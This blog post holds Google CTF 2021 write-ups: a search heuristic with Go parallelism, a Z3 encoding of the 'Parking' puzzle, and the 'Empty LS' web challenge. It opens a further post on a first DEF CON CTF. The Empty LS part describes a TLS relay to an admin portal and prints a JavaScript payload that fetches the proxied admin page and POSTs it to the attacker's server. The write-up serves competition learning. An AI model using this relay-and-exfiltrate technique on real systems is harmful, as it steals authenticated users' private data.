<p>This exploration step is there in the hope that, by chance, the program bumps into the <em>correct</em> node that leads us to victory. This “optimization” shouldn’t have a big impact on the overall dynamics of the search, but it is a cheap way to improve it anyhow.</p>
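<p>A rough sketch of that selection rule, assuming the queue is a <code class="language-plaintext highlighter-rouge">heapq</code> list of unique entries whose first element is the negated heuristic. “Something in the middle” is interpreted here as the entry of median priority; that interpretation and the name <code class="language-plaintext highlighter-rouge">pick_node</code> are assumptions, not the original code.</p>

```python
import heapq
import random


def pick_node(heap, p, rng=random):
    """With probability p, pop the best entry (smallest key, i.e. largest
    heuristic); otherwise remove and return the median-priority entry."""
    if len(heap) < 3 or rng.random() < p:
        return heapq.heappop(heap)  # exploit: top of the priority queue
    # explore: the entry halfway down the priority order
    middle = heapq.nsmallest(len(heap) // 2 + 1, heap)[-1]
    heap.remove(middle)   # entries are unique thanks to the tie-breaker
    heapq.heapify(heap)   # O(n) repair after removing an arbitrary entry
    return middle


# Entries are (negated score, tie-breaker).
queue = [(-s, i) for i, s in enumerate([5, 1, 9, 3, 7])]
heapq.heapify(queue)
print(pick_node(queue, p=1.0))  # (-9, 2): always the best when p = 1
```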

<h3 id="parallelization">Parallelization</h3>

<p>Now time for multithreaded computing. This is actually pretty easy to code with Go’s built-in goroutines and <code class="language-plaintext highlighter-rouge">sync.Cond</code>. All I needed was to start some worker goroutines and use <code class="language-plaintext highlighter-rouge">sync.Cond</code> to notify the workers each time a new node was found. I left it running for some time and restarted it whenever it got stuck for more than 5 minutes, hoping the exploration mechanism above would kick in. It did work some magic, as I was able to get lists with a large <code class="language-plaintext highlighter-rouge">count</code>.</p>
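<p>The original used goroutines and <code class="language-plaintext highlighter-rouge">sync.Cond</code>; to keep all examples in one language, here is a rough Python analog of the same coordination pattern built on <code class="language-plaintext highlighter-rouge">threading.Condition</code>. It is a sketch, not the author’s code: <code class="language-plaintext highlighter-rouge">parallel_search</code>, <code class="language-plaintext highlighter-rouge">expand</code> and <code class="language-plaintext highlighter-rouge">limit</code> are hypothetical names, and since CPython threads share the GIL, it illustrates the notification logic rather than a real speedup.</p>

```python
import heapq
import threading


def parallel_search(start, expand, n_workers=4, limit=10_000):
    """Expand nodes from a shared priority queue with several worker threads.

    A worker that produces new nodes pushes them and calls notify_all(),
    the Python counterpart of sync.Cond.Broadcast(). Returns how many nodes
    were expanded (at most `limit`)."""
    cond = threading.Condition()
    heap = [start]
    busy = 0        # workers currently expanding a node outside the lock
    expanded = 0

    def worker():
        nonlocal busy, expanded
        while True:
            with cond:
                # Nothing queued, but someone may still produce work: sleep.
                while not heap and busy > 0:
                    cond.wait()
                if not heap or expanded >= limit:
                    cond.notify_all()   # let sleeping workers notice and exit
                    return
                node = heapq.heappop(heap)
                busy += 1
                expanded += 1
            children = expand(node)     # expensive part runs without the lock
            with cond:
                for child in children:
                    heapq.heappush(heap, child)
                busy -= 1
                cond.notify_all()       # wake workers waiting for new nodes

    threads = [threading.Thread(target=worker) for _ in range(n_workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return expanded
```

<p>For example, with <code class="language-plaintext highlighter-rouge">expand = lambda n: [2 * n, 2 * n + 1] if n &lt; 64 else []</code>, <code class="language-plaintext highlighter-rouge">parallel_search(1, expand)</code> expands all 127 nodes of that binary tree.</p>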

<hr />

<p>Its best <code class="language-plaintext highlighter-rouge">count</code> eventually stalled at 1636, and this is what I got in the end:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">l1</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">]</span>
<span class="n">l2</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">]</span>
</code></pre></div></div>

<p>During the search, in order to record the states, <strong>I had already turned the states into base-6 numbers</strong>, but I never printed them out to see what was going on. What a sad story.</p>

<p>The code I wrote is over here (very messy): <a href="https://gist.github.com/superfashi/aa090637fb2ba1ade48c58a9f816455b">number (gist)</a>.</p>

<h1 id="parking">PARKING</h1>

<p>I didn’t actually solve this challenge during the match (my teammate did), but I did look into the question and found it pretty interesting. After the competition I tried to solve it myself, and I think I found a “partially unintended” way of solving it.</p>

<p>This challenge is marked as <code class="language-plaintext highlighter-rouge">hardware</code> because the map <code class="language-plaintext highlighter-rouge">level2</code> actually works like a circuit, where you can clearly identify ordinary <code class="language-plaintext highlighter-rouge">AND</code>, <code class="language-plaintext highlighter-rouge">OR</code> and <code class="language-plaintext highlighter-rouge">NOT</code> gates. The intended way, which my teammate took in the end, is to extract the circuit and solve it with a SAT/SMT solver such as the famous Z3. A <a href="https://ctftime.org/writeup/29351">write-up that tells you how to do it was nicely written by User1@osogi from team s3qu3nc3</a>; take a look!</p>

<p>However, on closer inspection of the level, I realized that even if we ignore the space taken up by other blocks, each block can only make a small number of moves. For example:</p>

<p><img src="/assets/images/google-ctf-2021/parking-1.png" alt="parking-1" /></p>

<p>This is a region that contains a lot of blocks, but let’s focus on just one block and take away all the others. Now you can slide that block freely up and down (or left and right if the block lies horizontally). But no matter which block you choose, the rugged walls leave it very few places to go. Using this observation, we can set up the variables so that the Z3 solver does all the work for us.</p>

<p>In what follows, \((x, y, w, h)\) denotes a non-wall block with its upper-left corner at position \((x,y)\) and dimensions \((w, h)\), with the implicit requirement that \(w = 1 \lor h=1\).</p>

<h2 id="variables">Variables</h2>

<p>The first thing to do is to turn the wall blocks into a Boolean matrix \(M\) of dimensions \((\text{width}, \text{height})\), where \(M_{x, y}\) is <code class="language-plaintext highlighter-rouge">true</code> if position \((x,y)\) is covered by a wall block, and <code class="language-plaintext highlighter-rouge">false</code> otherwise.</p>

<p>Without \(M\), checking whether a block \((x, y, w, h)\) intersects a wall takes \(O(n)\) time every time, where \(n\) is the number of wall blocks. With \(M\), the check takes only \(O(w\cdot h)\) time, which is much more efficient.</p>

<p>To further compress the space usage, we can use a 1-D bit vector \(S\) of size \(\text{width}\cdot \text{height}\) instead, where \(S_{x\cdot \text{height}+y} = M_{x, y}\).</p>
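<p>A minimal sketch of \(S\) in Python, using an arbitrary-precision <code class="language-plaintext highlighter-rouge">int</code> as the bit vector. The function names are hypothetical, and the original exploit may store the bits differently.</p>

```python
def build_wall_bits(walls, width, height):
    """Pack the wall matrix M into a single Python int S used as a bit vector,
    with bit x * height + y set iff cell (x, y) is covered by a wall block."""
    bits = 0
    for x, y, w, h in walls:
        for i in range(w):
            for j in range(h):
                cx, cy = x + i, y + j
                assert 0 <= cx < width and 0 <= cy < height, "wall outside board"
                bits |= 1 << (cx * height + cy)
    return bits


def hits_wall(bits, block, height):
    """O(w * h) overlap test between block (x, y, w, h) and the walls."""
    x, y, w, h = block
    return any((bits >> ((x + i) * height + (y + j))) & 1
               for i in range(w) for j in range(h))


S = build_wall_bits([(0, 0, 3, 1)], width=4, height=4)  # cells (0,0), (1,0), (2,0)
print(hits_wall(S, (2, 0, 1, 2), 4), hits_wall(S, (0, 1, 3, 1), 4))  # True False
```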

<p>With \(S\), we can quickly calculate all possible moves for each block by sliding it up and down, or left and right, one step at a time until it hits a wall. We represent each move as an integer \(i\): a positive \(i\) means the block moves down or right by \(i\) steps, a negative \(i\) means it moves up or left by \(-i\) steps, and zero means it stays where it was at the beginning. Notice that every block has zero in its move set \(D(b)\) (action domain), except for the red block, because the red block has to be moved by at least one step.</p>

<p>For example,</p>

<p><img src="/assets/images/google-ctf-2021/parking-2.png" alt="parking-2" /></p>

\[\begin{aligned}
D(\text{red}) &amp;= \{-1, 0, 1, 2\}\\
D(\text{blue}) &amp;= \{-3, -2, -1, 0\}\\
D(\text{green}) &amp;= \{-1, 0\}
\end{aligned}\]
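<p>The sliding step can be sketched as follows, assuming a helper <code class="language-plaintext highlighter-rouge">is_wall(x, y)</code> (for example, backed by \(S\)) that also treats cells outside the board as walls, so that the loops terminate. Other non-wall blocks are ignored, as described above, and the toy board is made up. The sketch always includes 0 in \(D(b)\); for the red block, which has to move, one would drop it.</p>

```python
def move_domain(block, is_wall):
    """Slide a lone block along its axis until it hits a wall and return its
    move set D(b), sorted. block is (x, y, w, h) with w == 1 or h == 1."""
    x, y, w, h = block
    # h == 1 is treated as horizontal (1x1 blocks are not handled specially).
    dx, dy = (1, 0) if h == 1 else (0, 1)

    def fits(k):
        """Would the block shifted by k steps avoid every wall cell?"""
        nx, ny = x + k * dx, y + k * dy
        return not any(is_wall(nx + i, ny + j) for i in range(w) for j in range(h))

    moves = [0]                    # staying put counts as a move
    for direction in (1, -1):      # +: right/down, -: left/up
        k = direction
        while fits(k):
            moves.append(k)
            k += direction
    return sorted(moves)


def moved_versions(block, domain):
    """The candidate blocks b_{i,k}: the same block shifted by each k in D(b)."""
    x, y, w, h = block
    dx, dy = (1, 0) if h == 1 else (0, 1)
    return [(x + k * dx, y + k * dy, w, h) for k in domain]


# Toy 8x3 board (hypothetical): walls at (0, 1) and (7, 1), plus the border.
WALLS = {(0, 1), (7, 1)}

def toy_is_wall(x, y):
    return not (0 <= x < 8 and 0 <= y < 3) or (x, y) in WALLS

print(move_domain((3, 1, 2, 1), toy_is_wall))  # [-2, -1, 0, 1, 2]
print(move_domain((5, 0, 1, 2), toy_is_wall))  # [0, 1]
```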

<p>There are 320,768 non-wall blocks in total, and 1,002,421 possible moves across all blocks (<strong>staying at the original location also counts as one move</strong>), so on average a block has about 3.13 possible moves.</p>

<p>Notice that each move “generates” a new block that could potentially exist in the final state of the board. If we have a block \(b_i = (x, y, w, 1)\) with \(D(b_i)=\{-1, 0\}\), then in the final state of the board either \(b_{i,0} = (x, y, w, 1)\) or \(b_{i, -1} = (x-1, y, w, 1)\) exists. We can then turn each of these indicators into a Boolean value, where \(b_{i,0}\) being <code class="language-plaintext highlighter-rouge">true</code> means that \(b_{i,0}\) exists in the final state of the board and <code class="language-plaintext highlighter-rouge">false</code> means it does not, and so on.</p>

<blockquote>
  <p>I’ll abuse notation a bit, so that a block symbol denotes a four-tuple and a Boolean value at the same time.</p>
</blockquote>

<p>The given code encodes the final state \(s_i\) of green block \(i\) as a single bit of the flag string: the bit is 0 if the block has not moved and 1 if it has. This converts nicely to our representation: \(s_i = \neg b_{i, 0}\).</p>

<h2 id="constraints">Constraints</h2>

<p>The first, obvious constraint is that</p>

\[\forall b_i,\bigvee_{j\in D(b_i)} b_{i,j}\]

<p>In plain English: for every non-wall block on the board, at least one of its possible “moved” versions must exist on the board, because a block cannot be taken off the board.</p>

<p>Next, each space \((i, j)\) on the board can be occupied by at most one block. Therefore, if two blocks \(a\) and \(b\) intersect, it must be that \(a \implies \neg b\) (abusing notation again). This automatically implies its contrapositive \(b \implies \neg a\), so we only need to add one of them to the constraints.</p>

<p>To build these constraints we need to find all intersecting pairs, and finding them the naive \(O(n^2)\) way will not do, because \(n \approx 10^6\) is far too large. Notice that the actual number of intersecting pairs is much smaller than \(n^2\), because a block can only intersect blocks nearby. Hence, we can precompute the spaces each block occupies, and then, for each space, add constraints so that only one block can occupy it. In pseudo-code:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>S := Map[(x, y) -&gt; Set[Block]]

FOR b IN blocks
  FOR (i, j) that b covers
    add b to set S[i, j]
  END
END

FOR (i, j) in S
  FOR b_1 in S[i, j]
    FOR b_2 in S[i, j] after b_1 (each unordered pair only once)
      add constraint (b_1 =&gt; !b_2)
    END
  END
END
</code></pre></div></div>

<p>That’s it. Notice that we did not add a constraint allowing only one moved version of each block on the board, so the solver may well set two disjoint versions of the same block to <code class="language-plaintext highlighter-rouge">true</code> (e.g. both \(b_{i, -2}\) and \(b_{i, 2}\)). In practice, that did not affect our final answer: given how tight the spaces are, a block taking up two places is very unlikely.</p>

<p>In total there are 3,288,449 constraints and 1,002,421 variables, and Z3 took about 3 minutes to solve them on my computer. The exploit can be found here: <a href="https://gist.github.com/superfashi/9de9c0828dd7229ddf3940e57b6220c9">Parking, Google CTF 2021</a>.</p>
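<p>For reference, here is a small Python sketch of the constraint construction described in this section: the “at least one version” clauses plus the pairwise conflicts found through a cell-to-variables map. Variables are <code class="language-plaintext highlighter-rouge">(i, k)</code> pairs standing for \(b_{i,k}\). The toy domains are made up, and a brute-force enumeration stands in for Z3 since it is only practical for a handful of variables; in the real solve, the clauses would go to Z3 instead (for instance via <code class="language-plaintext highlighter-rouge">Or</code> and <code class="language-plaintext highlighter-rouge">Implies</code> over <code class="language-plaintext highlighter-rouge">Bool</code> variables).</p>

```python
from collections import defaultdict
from itertools import product


def cells(block):
    x, y, w, h = block
    return [(x + i, y + j) for i in range(w) for j in range(h)]


def build_constraints(domains):
    """domains[i] lists the candidate positions b_{i,k} of block i.
    Returns (at_least_one, conflicts): one clause per block saying some version
    is on the board, and unordered pairs (u, v) meaning u => not v."""
    occupants = defaultdict(set)  # cell -> variables covering it
    for i, versions in enumerate(domains):
        for k, pos in enumerate(versions):
            for c in cells(pos):
                occupants[c].add((i, k))
    at_least_one = [[(i, k) for k in range(len(v))] for i, v in enumerate(domains)]
    conflicts = set()  # a set, so pairs sharing several cells are added once
    for vs in occupants.values():
        vs = sorted(vs)
        for a in range(len(vs)):
            for b in range(a + 1, len(vs)):  # each unordered pair once
                conflicts.add((vs[a], vs[b]))
    return at_least_one, conflicts


def satisfying_assignments(domains):
    """Brute-force stand-in for the solver on tiny instances."""
    at_least_one, conflicts = build_constraints(domains)
    variables = [(i, k) for i, v in enumerate(domains) for k in range(len(v))]
    for values in product([False, True], repeat=len(variables)):
        val = dict(zip(variables, values))
        ok_cover = all(any(val[v] for v in clause) for clause in at_least_one)
        ok_overlap = not any(val[u] and val[v] for u, v in conflicts)
        if ok_cover and ok_overlap:
            yield val


# Two horizontal blocks in one row; the version lists are hypothetical.
TOY = [[(0, 0, 2, 1), (1, 0, 2, 1)],   # block 0: stay, or move right by 1
       [(2, 0, 2, 1), (1, 0, 2, 1)]]   # block 1: stay, or move left by 1
print(list(satisfying_assignments(TOY)))
```

<p>On this toy board, the only model keeps both blocks in place, i.e. \(s_0 = s_1 = 0\).</p>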

<hr />

<h1 id="empty-ls">EMPTY LS</h1>

<p>Although I’m one of the web gang, there were so many interesting tasks this time that I didn’t even look at any of the web challenges. Empty LS is an exception because I overheard the solution while my teammates were discussing it. I think it’s a pretty creative challenge, so I want to write up the solution here as well.</p>

<p>The challenge revolves around two domains: <code class="language-plaintext highlighter-rouge">https://www.zone443.dev</code>, a website for registering accounts and custom subdomains, and <code class="language-plaintext highlighter-rouge">https://admin.zone443.dev</code>, an “admin portal” and presumably where we should get the flag.</p>

<p>Authentication on this website is unusual: instead of the traditional username/password or cookies, it uses a process called <em>mTLS</em>, which stands for Mutual TLS. Basically, when connecting to a server, the client also presents a certificate, which achieves two things:</p>

<ol>
  <li>Validate the identity of the client, and</li>
  <li>Bind the connection to that identity, since the client must sign the handshake with the certificate’s private key.</li>
</ol>

<p>Unlike cookies or passwords, a client identity under mTLS is quite hard to steal, because the private key is kept safe and the only way to get it is to somehow take control of the client’s machine. And the client is running the latest headless Chrome, so no Chrome 0-days for us. There might also be vulnerabilities in the mTLS implementation, but since this is a <code class="language-plaintext highlighter-rouge">web</code> challenge rather than a <code class="language-plaintext highlighter-rouge">crypto</code> one, that seems highly unlikely.</p>

<h2 id="observations">Observations</h2>

<p>We made a few important observations:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">https://admin.zone443.dev</code> is behind a server that validates neither the Server Name Indication in the TLS ClientHello nor the <code class="language-plaintext highlighter-rouge">Host</code> header of the HTTP request; it only uses the client certificate as an application-level credential;</li>
  <li><code class="language-plaintext highlighter-rouge">https://admin.zone443.dev</code> is using a wildcard certificate with Subject Alternative Name including host <code class="language-plaintext highlighter-rouge">*.zone443.dev</code>;</li>
  <li>We have total control over the sub-domain we applied for, including applying for a valid TLS certificate; and</li>
  <li>By submitting our sub-domain’s address in the feedback form, we can make a headless Chrome request our sub-domain with the admin’s certificate.</li>
</ul>
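<p>The second observation matters because of how wildcard names are matched: a <code class="language-plaintext highlighter-rouge">*.zone443.dev</code> certificate is valid for any single-label sub-domain, including one we register ourselves. A small Go check using <code class="language-plaintext highlighter-rouge">crypto/x509</code>’s hostname matching (the certificate is a hand-built stand-in carrying only that SAN, not the real one; <code class="language-plaintext highlighter-rouge">WildcardCovers</code> is a hypothetical helper):</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import "crypto/x509"

// WildcardCovers reports whether a certificate whose only SAN is
// "*.zone443.dev" (like the admin server's) is valid for host, using the
// same hostname-matching rules crypto/x509 applies during verification.
// A wildcard stands for exactly one leftmost label.
func WildcardCovers(host string) bool {
	cert := x509.Certificate{DNSNames: []string{"*.zone443.dev"}}
	return cert.VerifyHostname(host) == nil
}
</code></pre></div></div>

<p>So if a connection to our sub-domain were to end up at the admin server, the browser would still see a certificate valid for the name it dialed.</p>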

<p>Combining 1 and 2, we realized that the server will accept <strong>any</strong> TLS connection, whatever name the client thinks it is talking to. And using 3 and 4, it is possible to capture the admin’s TLS handshake and the communication that follows.</p>

<p>The challenge gives another hint: when you access <code class="language-plaintext highlighter-rouge">admin.zone443.dev</code> with the client certificate you applied for yourself, a message tells you that you are not authorized. So presumably we get the flag only when we access the website with the admin’s client certificate.</p>
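<p>The behaviour implied by these hints can be modeled in a few lines of Go. This is a guess at the logic, not the real server: <code class="language-plaintext highlighter-rouge">AdminStatus</code> and the <code class="language-plaintext highlighter-rouge">"admin"</code> Common Name are hypothetical, and the point is only that the requested host never enters the decision.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import (
	"crypto/x509"
	"net/http"
)

// adminCN is a hypothetical Common Name for the admin's client certificate.
const adminCN = "admin"

// AdminStatus models the portal's check. host (the Host header or SNI) is
// accepted but deliberately ignored: only the verified client certificate
// chain, leaf first, decides the outcome.
func AdminStatus(host string, peers []*x509.Certificate) int {
	if len(peers) == 0 {
		return http.StatusUnauthorized // no client certificate at all
	}
	if peers[0].Subject.CommonName != adminCN {
		return http.StatusForbidden // e.g. the certificate we applied for ourselves
	}
	return http.StatusOK
}
</code></pre></div></div>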

<p>This clearly calls for some kind of man-in-the-middle attack. A replay attack won’t work, since TLS session keys are freshly randomized for every handshake. However, notice that the website is visited by a headless Chrome, meaning that it will also execute anything from <code class="language-plaintext highlighter-rouge">iframe</code> to <code class="language-plaintext highlighter-rouge">script</code> on our controlled sub-domain.</p>

<h2 id="exploit">Exploit</h2>

<p>Embedding JavaScript on our site that fetches <code class="language-plaintext highlighter-rouge">admin.zone443.dev</code> with the admin’s certificate seems like a good idea, but we cannot read the response because of the browser’s same-origin policy, which only CORS headers from the target could relax. However, the browser enforces this by comparing domain names on the client side; is there a way to circumvent this protection?</p>
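<p>To make the client-side check concrete, here is a Go sketch of the origin comparison (scheme, host, and port) a browser performs. <code class="language-plaintext highlighter-rouge">SameOrigin</code> is a hypothetical helper of mine; note that nothing in it looks at which server actually answers.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import (
	"net/url"
	"strings"
)

// origin returns the scheme://host:port triple a browser compares,
// filling in the default port for http and https.
func origin(raw string) (string, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return "", err
	}
	port := u.Port()
	if port == "" {
		switch u.Scheme {
		case "https":
			port = "443"
		case "http":
			port = "80"
		}
	}
	return u.Scheme + "://" + strings.ToLower(u.Hostname()) + ":" + port, nil
}

// SameOrigin reports whether a script on pageURL may read a response from
// targetURL without CORS. Only names are compared; the IP address or
// machine that actually answers plays no part.
func SameOrigin(pageURL, targetURL string) bool {
	a, err := origin(pageURL)
	if err != nil {
		return false
	}
	b, err := origin(targetURL)
	if err != nil {
		return false
	}
	return a == b
}
</code></pre></div></div>

<p>A relative <code class="language-plaintext highlighter-rouge">fetch('/')</code> from a page on <code class="language-plaintext highlighter-rouge">https://xxx.zone443.dev/</code> resolves to the page’s own origin, so the browser lets the script read the response no matter where the bytes really came from.</p>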

<p>This scenario is very similar to DNS rebinding, where we trick the client into thinking it is talking to the same domain name, so the same-origin restrictions don’t apply, while in fact its credentials are being used on another website.</p>

<p>Notice that we control the entire sub-domain, and that the <code class="language-plaintext highlighter-rouge">admin.</code> site validates neither SNI nor Host, meaning we can <strong>set up a proxy in the back-end that forwards anything sent from the client to <code class="language-plaintext highlighter-rouge">admin.zone443.dev:443</code> and back</strong>. Although we can’t read any of the actual communication because of TLS encryption, we can <strong>acquire the content in the front-end</strong> and send the data back to ourselves.</p>
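<p>A back-end relay like this can be sketched in Go as plain TCP forwarding. It never terminates TLS, so the browser’s handshake, including the admin’s client certificate, passes straight through to the upstream. <code class="language-plaintext highlighter-rouge">ServeProxy</code> and <code class="language-plaintext highlighter-rouge">Splice</code> are illustrative names, not taken from my actual exploit; in this challenge <code class="language-plaintext highlighter-rouge">upstreamAddr</code> would be <code class="language-plaintext highlighter-rouge">admin.zone443.dev:443</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import (
	"io"
	"net"
	"sync"
)

// Splice copies bytes between client and upstream in both directions until
// either side closes. It never looks inside the (TLS-encrypted) stream.
func Splice(client, upstream net.Conn) {
	var wg sync.WaitGroup
	wg.Add(2)
	pump := func(dst, src net.Conn) {
		defer wg.Done()
		_, _ = io.Copy(dst, src)
		// Closing both ends also unblocks the pump running the other way.
		dst.Close()
		src.Close()
	}
	go pump(upstream, client)
	go pump(client, upstream)
	wg.Wait()
}

// ServeProxy accepts TCP connections on ln and forwards each one, byte for
// byte, to upstreamAddr.
func ServeProxy(ln net.Listener, upstreamAddr string) error {
	for {
		client, err := ln.Accept()
		if err != nil {
			return err
		}
		go func(c net.Conn) {
			upstream, err := net.Dial("tcp", upstreamAddr)
			if err != nil {
				c.Close()
				return
			}
			Splice(c, upstream)
		}(client)
	}
}
</code></pre></div></div>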

<p>That means we can first make the admin access our controlled sub-domain <code class="language-plaintext highlighter-rouge">https://xxx.zone443.dev/</code>, so that it will execute a JavaScript payload on our website. The payload looks something like this:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">fetch</span><span class="p">(</span><span class="k">new</span> <span class="nc">Request</span><span class="p">(</span><span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">)).</span><span class="nf">then</span><span class="p">(</span><span class="nx">resp</span> <span class="o">=&gt;</span> <span class="nx">resp</span><span class="p">.</span><span class="nf">text</span><span class="p">()).</span><span class="nf">then</span><span class="p">(</span><span class="nx">body</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="k">return</span> <span class="nf">fetch</span><span class="p">(</span><span class="k">new</span> <span class="nc">Request</span><span class="p">(</span><span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span>
        <span class="na">method</span><span class="p">:</span> <span class="dl">"</span><span class="s2">POST</span><span class="dl">"</span><span class="p">,</span>
        <span class="na">body</span><span class="p">:</span> <span class="nx">body</span><span class="p">,</span>
    <span class="p">}));</span>
<span class="p">});</span>
</code></pre></div></div>

<p>This script tries to fetch the content of the <strong>same</strong> domain name <code class="language-plaintext highlighter-rouge">https://xxx.zone443.dev/</code>, but since we have already set up the proxy, the request is actually sent over to <code class="language-plaintext highlighter-rouge">admin.zone443.dev:443</code> and back. The acquired content is then sent back to our server via a <code class="language-plaintext highlighter-rouge">POST</code> request, where we can see what <code class="language-plaintext highlighter-rouge">admin.</code> shows to the admin.</p>

<p>In the actual exploit, we keep track of the incoming TCP connections: on the first and third connection we use our own TLS cert and server to handle the request, but on the second we forward the traffic to <code class="language-plaintext highlighter-rouge">admin.</code> so that its content can be stolen. Notice that this is not as time-sensitive as a normal DNS rebinding would be, as there is no “caching” mechanism for TLS connections. HTTP/2 multiplexing might potentially affect the result, but I didn’t encounter that in my exploit, and it can easily be mitigated by closing the connection on the server side.</p>
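<p>The connection-counting rule can be sketched as a tiny Go router. The names are hypothetical, and it only decides where each accepted TCP connection should go; serving our own page over TLS and relaying to <code class="language-plaintext highlighter-rouge">admin.</code> are left out.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import "sync"

// Target says where an accepted TCP connection should be sent.
type Target int

const (
	OwnServer     Target = iota // serve our page or collect the POST ourselves
	AdminUpstream               // splice the raw bytes to the admin server
)

// ConnRouter counts accepted connections: every connection except the
// second is handled by our own server, and the second is relayed to admin.
type ConnRouter struct {
	mu   sync.Mutex
	seen int
}

// Next returns the target for the next accepted connection.
func (r *ConnRouter) Next() Target {
	r.mu.Lock()
	defer r.mu.Unlock()
	r.seen++
	if r.seen == 2 {
		return AdminUpstream
	}
	return OwnServer
}
</code></pre></div></div>

<p>An accept loop would call <code class="language-plaintext highlighter-rouge">Next</code> once per accepted connection, handing it to a local TLS server for <code class="language-plaintext highlighter-rouge">OwnServer</code> or splicing it to the admin host for <code class="language-plaintext highlighter-rouge">AdminUpstream</code>.</p>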

<p>The exploit is easy to write with the help of Go’s built-in <code class="language-plaintext highlighter-rouge">tls</code> and <code class="language-plaintext highlighter-rouge">http</code> packages.</p>

<p><img src="/assets/images/google-ctf-2021/empty-ls.png" alt="empty-ls" /></p>

<p>The exploit is over here: <a href="https://gist.github.com/superfashi/5ad6d7ea91357611fb7b2fb64138fc43">EMPTY LS, Google CTF 2021</a>. It is not host-dependent, so you can simply run it without changing anything (other than putting your X.509 cert/key pair in the right place).</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="CTF" /><category term="Hacking" /><category term="Reversing" /><category term="Web" /><category term="Hardware" /><summary type="html"><![CDATA[This weekend I was planning to play The Great Ace Attorney: Adventures with my SO.]]></summary></entry><entry><title type="html">My First CTF Experience</title><link href="http://0.0.0.0/blog/my-first-ctf-experience/" rel="alternate" type="text/html" title="My First CTF Experience" /><published>2021-05-04T10:30:00-04:00</published><updated>2021-05-04T10:30:00-04:00</updated><id>http://0.0.0.0/blog/my-first-ctf-experience</id><content type="html" xml:base="http://0.0.0.0/blog/my-first-ctf-experience/"><![CDATA[<p>I was one of the <a href="https://ctftime.org/team/38838">Tea Deliverers</a> at <a href="https://oooverflow.io/dc-ctf-2021-quals/">DEF CON 29 CTF Quals</a>.
<!--more--></p>

<p>I was lucky enough to play in this famous CTF event with some of the best hackers out there, and I definitely couldn’t miss this opportunity, even though it fell during the 5-day International Workers’ Day holiday here in China.</p>

<p>This is <strong>NOT</strong> a write-up <strong>NOR</strong> a blog for a general audience, but merely a record of what I did and what I thought during my first-ever CTF.</p>

<h1 id="0x00">0x00</h1>

<p>I honestly had no idea who I was going to work with before the event. My supervisor at my internship at Chaitin simply asked if I wanted to be on a CTF team, and I said yes. I was then connected to <a href="https://github.com/zTrix">@zTrix</a>, the CTO of the company, and joined a team called <em>Tea Deliverers</em>, which is obviously one of the best CTF teams in the entire world.</p>

<p>Fun fact, the company founders got to know each other at CTF events, and they founded this security company together because of their experiences as teammates.</p>

<p>I signed up as one of the “web gangs,” and told the group leader I’m probably good at XSS (although I’ve probably done more binary reversing than XSS, and I’m good at neither). Spoiler alert: I later found out there were practically no web challenges in this CTF. Sad.</p>

<p>We had a fancy dinner the eve before the match at a seafood/hotpot/BBQ buffet place, which is worth mentioning, because who doesn’t like free food?</p>

<p>The competition started at 8 AM China local time and lasted 48 hours non-stop, so I had better get some good sleep.</p>

<h1 id="day-1">Day 1</h1>

<p>I arrived at our “base,” which is just an office room at the company, shortly after the release of the first challenge, <em>say-hellooo</em>.</p>

<h2 id="say-hellooo">say-hellooo</h2>

<blockquote>
  <p>8:00 AM</p>
</blockquote>

<p>This challenge simply asks you to call the event host @Zardus and ask for the flag. Finding the phone number was rather easy: the host’s Twitter links to his personal website, which has his CV, and his CV lists his phone number. I called him, and after some chitchat he said that the flag is “<em>hellospacehackers</em>, all lower case.” And…… it’s not correct.</p>

<p>But of course it was correct; I was just stupid enough not to realize that when he said “space” he meant the whitespace, not the word. After a teammate reminded me, I got the first flag for the team and, spoiler alert, my only flag during the event.</p>

